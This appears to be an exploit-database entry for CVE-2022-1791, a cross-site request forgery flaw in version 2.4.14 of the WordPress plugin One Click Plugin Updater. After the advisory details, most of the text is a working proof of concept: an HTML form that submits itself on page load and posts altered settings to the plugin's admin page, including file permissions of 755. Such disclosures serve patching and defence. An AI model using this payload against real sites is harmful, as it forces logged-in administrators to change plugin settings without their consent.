CVE: CVE-2022-1791

Name: One Click Plugin Updater (one-click-plugin-updater)

Version: 2.4.14

Date: 2022-04-20 21:35:05

Advisory: https://wpscan.com/vulnerability/5c185269-cb3a-4463-8d73-b190813d4431

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/plugins.php?page=plugin_upgrade_options" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="updater_module" value="updater_plugin">
    <input type="text" name="enable_plugin_checks" value="on">
    <input type="text" name="plugin_check_interval" value="43200">
    <input type="text" name="global_notices" value="on">
    <input type="text" name="mark_plugins_with_notifications" value="on">
    <input type="text" name="hide_notifications_for_inactive" value="on">
    <input type="text" name="hide_update_count_blurb" value="on">
    <input type="text" name="enable_wordpress_checks" value="on">
    <input type="text" name="wordpress_check_interval" value="43200">
    <input type="text" name="new_file_permissions" value="755">
    <input type="text" name="Submit" value="Save Changes">
</form>
<script>
    document.forms[0].submit();
</script>